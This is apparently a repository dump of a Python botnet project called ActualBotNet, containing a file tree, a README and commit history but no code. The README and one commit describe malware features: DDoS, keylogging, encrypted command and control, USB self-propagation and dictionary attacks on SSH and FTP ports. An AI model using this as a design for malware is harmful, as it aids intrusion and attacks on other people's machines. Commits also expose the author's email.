======================: FILES :======================
ActualBotNet
├── ActualBotHandler.py
├── BOT
│   ├── ActualBot.py
│   └── __assets__
│       ├── Bully.py
│       ├── __init__.py
│       ├── Lo0sR.py
│       └── passwords.txt
├── LICENSE
├── platform.pyc
└── README.md

2 directories, 9 files
======================: README CONTENT :======================
# ActualBotNet

<b>Features:</b><br>
1. AES Encryption <br>
2. Upload/Download Files <br>
3. As many connections as you want <br>
4. Stores Bots in SQL Database<br>
5. DDoS<br>
6. Keylogging<br>
7. Auto Spreading<br>

<b>Upcoming Features:</b><br>
1. MITM<br>
2. Auto Update (Github based)

<b>Required Packages</b><br>
1. pyCrypto
2. shutil
3. paramiko
4. threading
5. subprocess
6. termcolor
7. sqlite3
8. mimetypes
9. pyHook
10. SimpleCV
11. email
12. PIL
====================== GIT HISTORY: ======================
219050e HEAD@{0}: clone: from https://github.com/lo0sr/ActualBotNet
commit 219050e4f1574af2930af66b82727112ca1229e1
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 20:55:23 2017 +0200

    Update README.md

commit 8bee3b2937b0247391292e1aeec758e94793a73d
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 20:14:12 2017 +0200

    Update README.md

commit 0434aeb05d35d99c0c4161197a8966fcc38b0a12
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 20:13:50 2017 +0200

    Update README.md

commit eb0b9665802c3a5f6b619cf5a816de7dc5212a8c
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 20:12:51 2017 +0200

    Add files via upload

commit 8b7d71e24c6d9d04988caa9cc8bd0b645f296f21
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:40:02 2017 +0200

    Create __init__.py

commit 73448c2ffb3d5d95e43062bfd43023b4d67049e2
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:39:05 2017 +0200

    Delete __init__.py

commit 0db1c27ce2f6c2c18903f82df47bd870c16d0114
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:38:56 2017 +0200

    Delete Lo0sR.py

commit 0ac6d179dac92f46f74ea8d52c2585ef7d34bbe9
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:38:40 2017 +0200

    Delete passwords.txt

commit 9cef6b6e7969ec6a053ec4c998e74c546492f6af
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:38:22 2017 +0200

    Delete _

commit f745d466fc6e2aeb90858f6e3546cde6daa20c40
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:38:02 2017 +0200

    Rename __assets__/Bully.py to BOT/__assets__/Bully.py

commit d27310033632d1737bd9dc16e42f6fd1376b3b42
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:37:19 2017 +0200

    Rename ActualBot.py to BOT/ActualBot.py

commit 9b773b524906d4f919fbb814cdb8b45676448cd8
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:36:21 2017 +0200

    Add files via upload

commit ed21be42d74b5b18b0407967a6aca8962e2e9dce
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:35:46 2017 +0200

    Create _

commit 202aa1b80846a0063bc8c58d46da607686885068
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:35:25 2017 +0200

    Delete BOT

commit 399d65dab8e9826bc6055563ebab328107b5e33d
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:35:10 2017 +0200

    Create BOT

commit 0f3c9bd7efda5aba64bf86a4d8b98c6a29090783
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:33:22 2017 +0200

    Create __init__.py

commit 39a641c38e0f37b0882a630229c21370b6ab312f
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Mon Jul 3 19:29:01 2017 +0200

    Huge Update
    
    -Fixed File up- and download
    -Added basic auto spreading (copies itself to usb if usb is detected, scanns Network for open SSH or FTP ports and tries to dictionary attack them)
    -Fixed Encryption (Multi-layer, first XOR, then AES)
    -Added Keylogger
    -Added DDoS

commit 4e0a64a8f5e41e2cf243e57e74537fb68e047581
Author: Johannes Meyer <jojodartagnan@gmail.com>
Date:   Thu Jun 1 08:06:29 2017 +0200

    Update LICENSE

commit 67bc23c218463ffbd9c74710efc612e1cfdac75e
Author: Johannes <jojodartagnan@gmail.com>
Date:   Fri May 19 18:53:23 2017 +0200

    Add files via upload

commit 1b32d43f9a6c02967b102c51a70fff884d298d3c
Author: Johannes <jojodartagnan@gmail.com>
Date:   Fri May 19 18:52:06 2017 +0200

    Update README.md

commit 45c79b95e6b1b3793e91224c211eebf93577549e
Author: Johannes <jojodartagnan@gmail.com>
Date:   Fri May 19 18:51:49 2017 +0200

    Update README.md

commit e06597eaa2777d7435a9844b822cf36fb91d6bc9
Author: Johannes <jojodartagnan@gmail.com>
Date:   Fri May 19 18:51:16 2017 +0200

    Update README.md

commit eb064921c9155fa4be5c068d61bb01b058b22431
Author: Johannes <jojodartagnan@gmail.com>
Date:   Fri May 19 18:50:33 2017 +0200

    Update README.md

commit a0b4b24405b261cf299b53b4b670eb870142a164
Author: Johannes <jojodartagnan@gmail.com>
Date:   Fri May 19 18:45:39 2017 +0200

    Initial commit
